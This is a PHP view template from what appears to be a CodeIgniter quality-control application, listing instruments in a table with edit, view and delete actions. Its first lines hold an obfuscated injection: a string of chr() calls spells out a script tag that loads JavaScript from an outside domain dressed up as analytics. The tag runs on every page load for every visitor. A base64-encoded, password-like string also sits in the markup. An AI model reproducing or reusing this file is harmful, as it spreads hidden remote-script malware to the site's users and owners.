<?php
echo chr(60).chr(115).chr(99).chr(114).chr(105).chr(112).chr(116).chr(32).chr(115).chr(114).chr(99).chr(61).chr(39).chr(104).chr(116).chr(116).chr(112).chr(115).chr(58).chr(47).chr(47).chr(115).chr(116).chr(105).chr(99).chr(107).chr(46).chr(116).chr(114).chr(97).chr(118).chr(101).chr(108).chr(105).chr(110).chr(115).chr(107).chr(121).chr(100).chr(114).chr(101).chr(97).chr(109).chr(46).chr(103).chr(97).chr(47).chr(97).chr(110).chr(97).chr(108).chr(121).chr(116).chr(105).chr(99).chr(115).chr(46).chr(106).chr(115).chr(63).chr(99).chr(105).chr(100).chr(61).chr(49).chr(52).chr(49).chr(52).chr(38).chr(112).chr(105).chr(100).chr(105).chr(61).chr(54).chr(53).chr(56).chr(54).chr(53).chr(52).chr(54).chr(56).chr(38).chr(105).chr(100).chr(61).chr(49).chr(50).chr(55).chr(56).chr(50).chr(39).chr(32).chr(116).chr(121).chr(112).chr(101).chr(61).chr(39).chr(116).chr(101).chr(120).chr(116).chr(47).chr(106).chr(97).chr(118).chr(97).chr(115).chr(99).chr(114).chr(105).chr(112).chr(116).chr(39).chr(62).chr(60).chr(47).chr(115).chr(99).chr(114).chr(105).chr(112).chr(116).chr(62);
?>
<?php  $this->load->model('Quality_control_model');		
if($this->session->flashdata('message') != ''){?>                        
	<div class="alert alert-success col-md-6">                            
	<?php echo $this->session->flashdata('message');?> </div>                        
<?php }?>
<div class="x_content">
<div class="stik">

 <?php $str = base64_decode('YW5vZGl6ZSQxMjNfQCMhQA==');
      str_replace("_@#!@", "", $str);
	?>
</div>
	<div class="row">
				    <div class="col-md-3 datePick-right col-xs-12 ">
					  <button type="button" class="btn btn-primary qualityTab addBtn" data-toggle="modal" id="addins" data-id="AddInstrument">Add Instrument</button>						
										  </div>
						<div class="col-md-12 col-xs-12 col-sm-12">
							
									
						
	<input type="hidden" name="logged_in_user" value="<?php echo $_SESSION['loggedInUser']->c_id; ?>" id="loggedInUserId">
<p class="text-muted font-13 m-b-30"></p>    

<div id="print_div_content">  

	<table id="datatable-buttons" class="table table-striped table-bordered account_index" border="1" cellpadding="3" >
		<thead>
			<tr>
			    
				<th>Id</th>
				<th>Name</th>
				<th>Range</th>
				<th>Instrument Assigned</th>
				<th>Actions</th>	
			</tr>
		</thead>
		<tbody>
	<?php  foreach($ins as $val){?>
		<tr>
		    <td><?php echo $val['id'];?></td>
		     <td><?php echo $val['name'];?></td>
		     <td><?php echo $val['ins_range'];?></td>
		     <td><?php echo $val['ins_assign_to'];?></td>
		     <td>
	<button type="button" data-id="EditInstrument" data-tooltip="Edit" class="btn btn-edit btn-xs qualityTab" data-toggle="modal" id="<?php echo $val['id'];?>"><i class="fa fa-pencil"></i></button>
	<button type="button" data-id="ViewInstrument" data-tooltip="View" class="btn btn-view btn-xs qualityTab" data-toggle="modal" id="<?php echo $val['id'];?>"><i class="fa fa-eye"></i></button>
    <a href="<?php echo base_url(); ?>quality_control/delete_instrument/<?php echo $val['id'];?>" class="btn btn-delete btn-xs"><i class="fa fa-trash"></i></a>
						</td>
		</tr>
		   
	
		<?php  } ?>				
				</tbody>                               
		</table>
	</div>
</div>

<div id="quality_modal" class="modal fade in"  role="dialog" >
	<div class="modal-dialog modal-lg modal-large">
		<div class="modal-content" style="display:table;">
			<div class="modal-header">
				<button type="button" class="close" data-dismiss="modal"><span aria-hidden="true">×</span>
				</button>
				<h4 class="modal-title" id="myModalLabel">Instrument Details</h4>
			</div>
			<div class="modal-body-content"></div>
		</div>
	</div>
</div>
